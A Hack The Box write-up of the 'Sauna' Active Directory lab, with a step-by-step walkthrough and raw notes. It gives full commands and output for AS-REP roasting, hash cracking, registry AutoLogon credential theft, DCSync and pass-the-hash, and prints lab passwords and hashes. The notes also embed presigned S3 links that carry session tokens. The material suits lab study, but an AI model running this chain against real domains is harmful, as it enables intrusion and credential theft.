Hack The Box · Lab
EasyWindowsActive DirectoryKerberos

Target: 10.10.10.175 | Difficulty: Easy | OS: Windows | Domain: EGOTISTICAL-BANK.LOCAL

Environment Setup

export IP=10.10.10.175
export DOMAIN=EGOTISTICAL-BANK.LOCAL
echo "$IP sauna.egotistical-bank.local egotistical-bank.local" | sudo tee -a /etc/hosts

Step 1 — Port Scan & Service Enumeration

Why: Identify exposed services and confirm this is a Domain Controller with web and WinRM access.

nmap -sCV -p- --min-rate 5000 -oN sauna.nmap $IP

Output:

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws

Key findings: Standard AD DC profile. HTTP (80) and WinRM (5985) are both exposed — worth enumerating the web service for usernames.

Step 2 — Web Reconnaissance & Username Generation

Why: The bank's public website may expose employee names that can be converted to valid AD username formats for a Kerberos attack.

# Browse http://$IP/about.html — the "Meet The Team" staff page lists:
# Fergus Smith, Shaun Coins, Hugo Bear, Bowie Taylor, Sophie Driver, Steven Kerb, Jenny Joy

# Generate common AD username formats:
cat > users.txt << 'EOF'
fsmith
scoins
hbear
btaylor
sdriver
skerb
jjoy
fergus.smith
shaun.coins
hugo.bear
bowie.taylor
sophie.driver
steven.kerb
jenny.joy
f.smith
s.coins
h.bear
smithf
EOF

Key findings: Seven employee names enumerated from the About page. Multiple AD username formats generated for AS-REP roast testing.

Step 3 — AS-REP Roasting

Why: If any accounts have Kerberos pre-authentication disabled, we can request an encrypted AS-REP ticket without credentials and crack it offline.

impacket-GetNPUsers $DOMAIN/ -usersfile users.txt -dc-ip $IP -no-pass -format hashcat

Output:

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:1c8f...e4a2$<hash>
hashcat -m 18200 fsmith.hash /usr/share/wordlists/rockyou.txt --force

Output:

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:...:Thestrokes23

Key findings: fsmith (Fergus Smith) has pre-authentication disabled. Cracked offline: fsmith:Thestrokes23.

Step 4 — WinRM Access as fsmith

Why: Port 5985 (WinRM) is open — if fsmith is in Remote Management Users, we get a shell directly.

evil-winrm -i $IP -u fsmith -p 'Thestrokes23'

Output:

Evil-WinRM shell v3.x
*Evil-WinRM* PS C:\Users\fsmith\Documents>
type C:\Users\fsmith\Desktop\user.txt

Key findings: Shell as fsmith. User flag captured.

Step 5 — AutoLogon Credential Discovery

Why: Windows AutoLogon stores service account credentials in the registry in cleartext — a common misconfiguration when a low-privilege account needs to log in automatically.

*Evil-WinRM* PS> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\winlogon"

Output:

DefaultDomainName    REG_SZ    EGOTISTICALBANK
DefaultUserName      REG_SZ    EGOTISTICALBANK\svc_loanmgr
DefaultPassword      REG_SZ    Moneymakestheworldgoround!

Key findings: AutoLogon configured with svc_loanmgr:Moneymakestheworldgoround! stored in plaintext.

Step 6 — BloodHound Enumeration as svc_loanmgr

Why: Map Active Directory ACL paths from svc_loanmgr to discover privilege escalation routes toward Domain Admin.

bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' \
  -d $DOMAIN -dc sauna.egotistical-bank.local -ns $IP --zip -c All
# BloodHound GUI → Mark svc_loanmgr as Owned
# Shortest Paths to Domain Admins:
# svc_loanmgr → GetChanges + GetChangesAll → EGOTISTICAL-BANK.LOCAL
# → DCSync rights!

Key findings: svc_loanmgr holds GetChanges and GetChangesAll rights on the domain object — full DCSync capability without touching LSASS.

Step 7 — DCSync → Dump Administrator Hash

Why: DCSync impersonates a Domain Controller replication request to extract NTLM hashes for any account directly from Active Directory.

impacket-secretsdump $DOMAIN/svc_loanmgr:'Moneymakestheworldgoround!'@$IP \
  -just-dc-user administrator

Output:

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::

Key findings: Administrator NT hash extracted: 823452073d75b9d1cf70ebdf86c7f98e.

Step 8 — Pass-the-Hash → Domain Admin

Why: WinRM accepts NTLM authentication — pass the Administrator hash directly without needing to crack it.

evil-winrm -i $IP -u administrator -H '823452073d75b9d1cf70ebdf86c7f98e'

Output:

*Evil-WinRM* PS C:\Users\Administrator\Documents>
type C:\Users\Administrator\Desktop\root.txt

Key findings: Full Domain Admin access via pass-the-hash. Root flag captured.

Credentials

Username Password / Hash Source
fsmith Thestrokes23 AS-REP Roast (KRB5 offline crack)
svc_loanmgr Moneymakestheworldgoround! AutoLogon registry (cleartext)
Administrator 823452073d75b9d1cf70ebdf86c7f98e (NT) DCSync via svc_loanmgr

Full Attack Chain

Web Staff Page (/about.html)
        │
        ▼ Enumerate employee names → generate username wordlist
AS-REP Roast (GetNPUsers — no pre-auth on fsmith)
        │
        ▼ hashcat -m 18200 → Thestrokes23
fsmith:Thestrokes23
        │
        ▼ evil-winrm :5985
USER FLAG
        │
        ▼ reg query winlogon (AutoLogon plaintext)
svc_loanmgr:Moneymakestheworldgoround!
        │
        ▼ BloodHound → GetChanges + GetChangesAll on domain
DCSync Rights on EGOTISTICAL-BANK.LOCAL
        │
        ▼ secretsdump -just-dc-user administrator
Administrator:823452073d75b9d1cf70ebdf86c7f98e
        │
        ▼ evil-winrm -H (Pass-the-Hash)
DOMAIN ADMIN / ROOT FLAG

© 0xNRG — Sauna pwned — 2020-07-18

notes

Startoff with nmap

basic


```shell
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49677/tcp open  unknown
49689/tcp open  unknown
49696/tcp open  unknown
```


scan on spec ports


```shell
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-27 14:12:42Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-27T14:12:45
|_  start_date: N/A
|_clock-skew: 7h00m00s
```

HTTP p80

![Screenshot_2025-07-27_at_9.24.19_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/765900b2-381a-4af5-89fe-0ff1c5a93c93/Screenshot_2025-07-27_at_9.24.19_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466SPDAVPDT%2F20260706%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260706T071154Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEIf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJFMEMCHxUg99a4gdYUbzv3mFTGNFOq2W8MqO53%2F7kPjYrC1XUCIFdLnF4O7IHKFprN0JtGIEBD4hkcizJc1oFl2%2BqZRk70Kv8DCFAQABoMNjM3NDIzMTgzODA1IgxU9L30QiQB%2B8wcSREq3APBRUf3w3bZwN0uLuIJBQt%2FNt567HADiED2FNH5veHUIAECQJi%2FZ7XMynP024OLNYN6PJJzrTrDC%2F%2B9sKQKtcaUm%2BGsGnEwKN2jfbqSLG764A%2BDp0V2SWdQQ9aVc8yFsQuQB1dNKT3%2ByH7K3DY42vGF5HZI5VpSuoEL8ow5WBGRj%2BGB08UmWqfez21XMlry7teCE6NvXclen3dcrcrtkNDGwi2wyPp0NI9ELN9dzzvkMtOBqSYUY2pGYT9XGmynNc%2F6zk3uQDEtLgggmOXh79hsco2HcS%2BlW4b7vcovBdZedDPvqoInbIMhCkT3PKMcC%2FPAD9XKnlhFWrfbV8KTvW1SX1wle%2FjGRbwQl1gbNPqe3A3gXo8yRdQbafiyFVq3Dj3Ny7m0q4NSz83TTVfuBPhODGgCW1s7LD48A4WJbQJu3Qz86aIRDHtyE%2BDHQ032bzm%2FhbliUl2w%2B9LjCXficAb5bALsDVJxkre56DKz9GjAyacs7on9h3kQV2Qt7cJCbKvi7jrOGm%2F7YUV6mk7HjGo0tjVL6WECFByVxSaOVTDosu3WPjbrju9myspljzhzTh6KMOAlnw2aPT0RjznpI7slKR1R1gmvgjXlA%2FflkfFgBwcmk5tUJ%2BwbFwZwajC%2Fm63SBjqnAcfYqU%2BYb3I4Pj6BtpGi0eT55e%2BCSDPqVJab2%2FDIKkOt88cLj6le28X3fv8inJRHgm3IbGt5vIQv3mg9ZumjEUCAl6VnnxWtljJMTfMYAgAplaDRS2IYXD%2FhW2Eu%2Bx8kk8MaS82CqmFcbfHESmOMN9p942XyuLGadIQs9p0E4Etk5XziAK%2Fz9ZOz1Qv15osMj4ExzyDxSwo%2B7dc05f1kJQiDXh6ep19a&X-Amz-Signature=a013601602e42b34501a4b7c14f54c13be1ceeb54602959859b30e1c5faf4c33&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


Possible users?


![Screenshot_2025-07-27_at_9.26.13_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/f25a4365-056e-497a-87a8-323dcc8647aa/Screenshot_2025-07-27_at_9.26.13_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466SPDAVPDT%2F20260706%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260706T071154Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEIf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJFMEMCHxUg99a4gdYUbzv3mFTGNFOq2W8MqO53%2F7kPjYrC1XUCIFdLnF4O7IHKFprN0JtGIEBD4hkcizJc1oFl2%2BqZRk70Kv8DCFAQABoMNjM3NDIzMTgzODA1IgxU9L30QiQB%2B8wcSREq3APBRUf3w3bZwN0uLuIJBQt%2FNt567HADiED2FNH5veHUIAECQJi%2FZ7XMynP024OLNYN6PJJzrTrDC%2F%2B9sKQKtcaUm%2BGsGnEwKN2jfbqSLG764A%2BDp0V2SWdQQ9aVc8yFsQuQB1dNKT3%2ByH7K3DY42vGF5HZI5VpSuoEL8ow5WBGRj%2BGB08UmWqfez21XMlry7teCE6NvXclen3dcrcrtkNDGwi2wyPp0NI9ELN9dzzvkMtOBqSYUY2pGYT9XGmynNc%2F6zk3uQDEtLgggmOXh79hsco2HcS%2BlW4b7vcovBdZedDPvqoInbIMhCkT3PKMcC%2FPAD9XKnlhFWrfbV8KTvW1SX1wle%2FjGRbwQl1gbNPqe3A3gXo8yRdQbafiyFVq3Dj3Ny7m0q4NSz83TTVfuBPhODGgCW1s7LD48A4WJbQJu3Qz86aIRDHtyE%2BDHQ032bzm%2FhbliUl2w%2B9LjCXficAb5bALsDVJxkre56DKz9GjAyacs7on9h3kQV2Qt7cJCbKvi7jrOGm%2F7YUV6mk7HjGo0tjVL6WECFByVxSaOVTDosu3WPjbrju9myspljzhzTh6KMOAlnw2aPT0RjznpI7slKR1R1gmvgjXlA%2FflkfFgBwcmk5tUJ%2BwbFwZwajC%2Fm63SBjqnAcfYqU%2BYb3I4Pj6BtpGi0eT55e%2BCSDPqVJab2%2FDIKkOt88cLj6le28X3fv8inJRHgm3IbGt5vIQv3mg9ZumjEUCAl6VnnxWtljJMTfMYAgAplaDRS2IYXD%2FhW2Eu%2Bx8kk8MaS82CqmFcbfHESmOMN9p942XyuLGadIQs9p0E4Etk5XziAK%2Fz9ZOz1Qv15osMj4ExzyDxSwo%2B7dc05f1kJQiDXh6ep19a&X-Amz-Signature=3daefd34c0ac82a2074f14fa0d7b538e7dbd0fe73ac9924089d385c4f8bd805c&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)

SMB Anonymous Auth success

Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)

Guest access null

Anon/guest share enum null

LDAP Anonymous auth success

windapsearch


```shell
❯ py /root/offsec/tools/windapsearch/windapsearch.py -d $DOMAIN --dc-ip $IP -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.175
[+] Getting defaultNamingContext from Root DSE
[+]	Found: DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Attempting bind
[+]	...success! Binded as: 
[+]	 None

[+] Enumerating all AD users

[*] Bye!
```

RPC Anon Auth null

We collected users from webpage and used usernames-generator.py

Used kerbrute with generated list and got hash from Fsmith due to no pre auth on account. It is encryption $18.

$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:274c882102df475650885d34e854453d$04cfd3ca758d056eae2098ad4fd96c375f60edc7e46ca226428b38c21264a47871cb5468880b1125a242333c66a49c7848b59cfb1f1fb3d0ad057f4283918148fdac531fb4a12435cd6584b2110ad8efd452eebe75bf4e62c1a2df19a87dcb39952a93a514820a805bbfae6b7036a785c18d5c2ca6053020e645e33582efd9659261d2749f35ccc0183bf93d29a83d0e6c7f97fde4eb4bb123fc1073b3b3108b2f274a73a145ca7f3275fb8cb5c1c27bcb272a5aa5d3764c56c244853f1f1f6b191664fc2ee91df460fd1be178b9053a63c33dc2eaa45a5b32b83b929c89b055bb1fa0c7f1a600b7c0190975e7ac86129b1bc34bcf0595af4be6bf01ae2aa6ec2a9e0988f1efb1c1f91a701adba50c919f9a2c9b3895

After running GetNPUsers.py we got Fsmith $23 TGT

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:e67a11e6a2abbed3aa5c07d94d84f71e$f0c81c4b62bec0393e3146838b18e7b3a28385eaef52ccc3aa47bd91e7d54fbc15313195e50b0d8537e2fbcdd4c182a8e340570b4b6129201a14495f371fb67e57e24a505bdef08632446a243596ee8a7d932a025107eaaae658c4d15965c8bf94f0afc15da92ff5bcdb5edf1258d973ba18f989379cbabf104ea7bec73832d72fa330b88c838c6b95e6c0bf55ac1472ef8522a90b3b2ad9b385cf96976e6bd8f5592aa0d02b1b954c13088541df86dbd2d8071024f2aab5feb65d4a23620d38218a6183d8be2138a105557d10bb327664017cc21e918c97db7796e0e07d109a0b6677607c418bd7672d6a1d0cdb1e889f9387024764d84a6b30d59f20b4e23d

TGT Cracked with hashcat

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:e67...SNIP...3d:Thestrokes23

Authorizing as fsmith from here on

SMB user enum

```shell
Administrator
krbtgt
hsmith
fsmith
svc_loanmgr
```


shares enum


```shell
ADMIN$                          Remote Admin
C$                              Default share
IPC$            READ            Remote IPC
NETLOGON        READ            Logon server share 
print$          READ            Printer Drivers
RICOH Aficio SP 8300DN PCL 6 WRITE           We cant print money
SYSVOL          READ            Logon server share
```


Write perm on RICOH..


    dir don’t exist


smb rid brute & awk for `SidTypeUser`


```shell
Administrator
Guest
krbtgt
SAUNA$
HSmith
FSmith
svc_loanmgr
```

No TGT pre auth for the rest of users

WinRM

```shell
❯ nxc winrm $IP -u $USER -p $PASS
[+] EGOTISTICAL-BANK.LOCAL\FSmith:Thestrokes23 (Pwn3d!)
```


```shell
❯ evil-winrm -i $IP -u $USER -p $PASS
*Evil-WinRM* PS C:\Users\FSmith\Documents>
```

PRIVESC

Uplaoded `winPEASx64.exe to target.

```shell
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
```

Bloodhound

![Screenshot_2025-07-27_at_11.22.53_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/39aafe7a-1717-4a20-b427-589cb8ad95e5/Screenshot_2025-07-27_at_11.22.53_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466YKDTJMNM%2F20260706%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260706T071155Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEIb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJIMEYCIQCLvrD9J%2BNmC4M88CSxYKOBsYXrmEemtOaNcZ4%2FxXV9BwIhAMQoHVFUfN4X2goEi1x7kEgvu7020HQRwZjRDkp7oJNTKv8DCE8QABoMNjM3NDIzMTgzODA1IgwlKcfB%2B5tXU8KmV5Yq3AOio%2BIrC7iTTTsSKp5cWqg65qWeMQBZMwiZchN7RCxPWH0Fiqw3ovR4M3wmZou0Vy2XS%2BFbhYShqeyy1R0iAhxg3eB6wHMRntQ%2BDwY%2FymfdtkkyNU3iDXeudkpOgotaoAkT039LJZgd0SBBmXO%2FY7iUEwUp88cPu5brr8iTM%2F%2Btg4yAntzbFIjVM1lkbnBoXmf65nQiwYwHzdVKd2P5%2BbKoq1evKflDSiIUgDrQ3U%2FEwc6m%2FWufdDb40Fix%2B1MRBkW88APXOS1uJo07wOOo6PUr9gtkwgxSSzi0LzshrFGC2DviGKvwzcwC9MdW5WvcXKibqJ1IDq9FDiVHardBV%2BgArQ9SNRNieU4dHs6NccGAX7L7B28yWTBk%2FAX4epuTjT3%2B0tAIhqCOG4IqUu6weCz%2BwxfbpQhz0zlXg5TOkrrqp2anIplZHFpNLqLj1PLL%2FdWUP4fTy%2FV14lTO1ILipiXI2c6pDogdiyZZcfIvL5%2FmCZCG4JTLgsQmgJqyjhMVEuTwC71Figxm1lGDvB85NNDgzSMOXQkerjUIiW8xkUL5gWGObdnXALD4WLi%2BWuCrSzfgZnzG0rcTWmplhzfkRAexpAyakqNEuuVju52EksC6dSNSU5rte9mqRJSneTDlhq3SBjqkAWPZc0WdT5Ckz9vFwfGrKWPj7UElt13kQpS9YMJdi6Rue68Ck3DgWo1xgYjLDk3PBdgQXJA4dL3DF9oNnk0njlO8y9vbyuI7AdH74S8kQPq530bf01tg4j0f7Z9Sv2%2BwaIv8gKCRM70umBNksL%2FbpYgmnkTUGWxoKzlc6qKsoEtKPTLlOnhOKpzonaCu3Cq1EJEexw%2BHxg%2Bn0n1c1JGH0TSU2dGo&X-Amz-Signature=8e673f1b64e3d9f55ba0161351e1541cf7878f04a42eb1386589f4542d46f9f0&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


![Screenshot_2025-07-27_at_11.23.24_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/605cdd4d-b2d1-48f2-9be6-8916b5f383d9/Screenshot_2025-07-27_at_11.23.24_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466YKDTJMNM%2F20260706%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260706T071155Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEIb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJIMEYCIQCLvrD9J%2BNmC4M88CSxYKOBsYXrmEemtOaNcZ4%2FxXV9BwIhAMQoHVFUfN4X2goEi1x7kEgvu7020HQRwZjRDkp7oJNTKv8DCE8QABoMNjM3NDIzMTgzODA1IgwlKcfB%2B5tXU8KmV5Yq3AOio%2BIrC7iTTTsSKp5cWqg65qWeMQBZMwiZchN7RCxPWH0Fiqw3ovR4M3wmZou0Vy2XS%2BFbhYShqeyy1R0iAhxg3eB6wHMRntQ%2BDwY%2FymfdtkkyNU3iDXeudkpOgotaoAkT039LJZgd0SBBmXO%2FY7iUEwUp88cPu5brr8iTM%2F%2Btg4yAntzbFIjVM1lkbnBoXmf65nQiwYwHzdVKd2P5%2BbKoq1evKflDSiIUgDrQ3U%2FEwc6m%2FWufdDb40Fix%2B1MRBkW88APXOS1uJo07wOOo6PUr9gtkwgxSSzi0LzshrFGC2DviGKvwzcwC9MdW5WvcXKibqJ1IDq9FDiVHardBV%2BgArQ9SNRNieU4dHs6NccGAX7L7B28yWTBk%2FAX4epuTjT3%2B0tAIhqCOG4IqUu6weCz%2BwxfbpQhz0zlXg5TOkrrqp2anIplZHFpNLqLj1PLL%2FdWUP4fTy%2FV14lTO1ILipiXI2c6pDogdiyZZcfIvL5%2FmCZCG4JTLgsQmgJqyjhMVEuTwC71Figxm1lGDvB85NNDgzSMOXQkerjUIiW8xkUL5gWGObdnXALD4WLi%2BWuCrSzfgZnzG0rcTWmplhzfkRAexpAyakqNEuuVju52EksC6dSNSU5rte9mqRJSneTDlhq3SBjqkAWPZc0WdT5Ckz9vFwfGrKWPj7UElt13kQpS9YMJdi6Rue68Ck3DgWo1xgYjLDk3PBdgQXJA4dL3DF9oNnk0njlO8y9vbyuI7AdH74S8kQPq530bf01tg4j0f7Z9Sv2%2BwaIv8gKCRM70umBNksL%2FbpYgmnkTUGWxoKzlc6qKsoEtKPTLlOnhOKpzonaCu3Cq1EJEexw%2BHxg%2Bn0n1c1JGH0TSU2dGo&X-Amz-Signature=cfaeb23a6fea71ea38118e606ed0f053e6024fc477efcbb2aa8137f065d29030&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


Lets use secretdump


```shell
❯ secretsdump.py $DOMAIN/$USER:$PASS@$IP -just-dc-user Administrator

...SNIP...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
```

We have Administrator HASH

Let’s pass the hash


```shell
❯ evil-winrm -i $IP -u $USER -H $HASH
                                        
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
```

Let’s use psexec also

❯ psexec.py $DOMAIN/$USER@$IP -hashes $HASH

C:\Windows\system32> whoami
nt authority\system

image.png